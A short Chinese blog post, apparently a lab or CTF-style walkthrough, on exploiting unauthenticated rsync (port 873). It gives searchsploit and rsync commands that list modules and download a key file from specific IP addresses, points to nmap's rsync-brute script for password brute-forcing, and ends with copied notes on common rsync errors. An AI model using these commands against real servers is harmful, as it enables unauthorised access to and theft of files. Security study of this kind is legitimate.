1. 查看哪些版本存在漏洞: 在kali中输入命令: searchsploit rsync
该漏洞存在于 873 端口
2. 测试漏洞是否存在: 在kali中输入: rsync 59.188.219.28::
进入 指定目录 rsync 59.188.219.28::wwwroot
报错:如下图,证明,密码是错的。默认密码 “::” 不对
3. 总结: 其实主要知道几条命令就行了
rsync IP:: //这是在默认条件下没有改变默认的端口,默认密码是:: rsync --port=xxx ip:: //如果修改了默认端口就需要指定端口,这里就是需要自己指定47900端口 rsync -avz ip::www /tmp //-avz是下载文件的命令,前一个是目标内容,后一个是自己指定存储在本地的路径 rsync -avz --port=xxx ip::dddd /tmp
4. 接下来直接尝试使用rsync连接啦
rsync --port=47900 219.153.49.228:: rsync --port=47900 219.152.49.228::volume rsync --port=47900 219.153.49.228::volume/key_1913718524583.php /tmp
5. 如果不rsync不是默认密码,那么可以使用 rsync-brute :https://svn.nmap.org/nmap/scripts/rsync-brute.nse 暴力破解脚本
3. 使用过程中常见的错误:
rsync 常见错误与解决方法整理 – 半前端半设计的四不像 – 博客园
问题一:
@ERROR: chroot failed
rsync error: error starting client-server protocol (code 5) at main.c(1522) [receiver=3.0.3]
原因:
服务器端的目录不存在或无权限,创建目录并修正权限可解决问题。
rsync 常见错误与解决方法整理 – 半前端半设计的四不像 – 博客园
问题二:
@ERROR: auth failed on module tee
rsync error: error starting client-server protocol (code 5) at main.c(1522) [receiver=3.0.3]
原因:
服务器端该模块(tee)需要验证用户名密码,但客户端没有提供正确的用户名密码,认证失败。
提供正确的用户名密码解决此问题。
rsync 常见错误与解决方法整理 – 半前端半设计的四不像 – 博客园
问题三:
@ERROR: Unknown module ‘tee_nonexists’
rsync error: error starting client-server protocol (code 5) at main.c(1522) [receiver=3.0.3]
原因:
服务器不存在指定模块。提供正确的模块名或在服务器端修改成你要的模块以解决问题。
转载请著名来源:天天小站 » rsync 存在漏洞的版本和使用方法